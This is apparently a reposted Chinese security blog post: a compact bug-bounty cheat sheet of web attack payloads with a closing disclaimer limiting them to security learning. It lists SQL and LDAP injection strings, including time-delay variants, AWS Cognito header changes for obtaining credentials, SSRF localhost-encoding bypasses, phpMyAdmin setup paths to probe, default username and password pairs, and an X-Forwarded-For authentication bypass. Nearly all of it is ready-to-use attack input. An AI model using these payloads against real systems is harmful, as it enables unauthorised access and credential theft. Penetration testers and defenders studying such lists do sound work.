' OR 1=1--' OR 1=0--%27%20or%201=1*(|(object=*)))%20or%20('x'='x%20or%201=11) or pg_sleep(__TIME__)--/**/or/**/1/**/=1' or username like '%);waitfor delay '0:0:__TIME__'--or isNULL(1/0) /*x' or 1=1 or 'x'='y

X-AMZ-Target：AWSCognitoIdentityProviderService.ConfirmSignUpX-AMZ-Target：AWSCognitoIdentityProviderService.GetUser获取凭证访问密钥 ID 和密钥 将标头更改为这样并观察响应X-AMZ-TARGET：AWSCognitoIdentityService.GetCredentialsForIdentity

SSRF Bypasses
http://0.0.0.0http://0http://0x7f000001http://2130706433http://0000::1http://0000::1:25http://0000::1:22http://0000::1:3128http://2130706433http://3232235521http://3232235777http://2852039166http://0o177.0.0.1

当默认凭据在#phpmyadmin登录时不起作用时，我会尝试访问这些路径
admin/phpMyAdmin/setup/index.phpphpMyAdmin/main.phpphpmyadmin/pma/Admin/setup/index.phpphpmyadmin/admin/setup/index.phpphpmyadmin/setup/phpmyadmin/setup/index.php

admin:adminadmin:aadmin:12346578test:testguest:guestanonymous:anonymousadmin:passwordadmin:root:toorroot:passw0rdroot:rootguest:test$sub_name:passwordADMIN:ADMINAdmin:Admin:a:a

Authentication bypass.... 
Using custom header (See attached screenshot):
X-Forwarded-For: 127.0.0.1

文章来源：Hack学习呀

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

END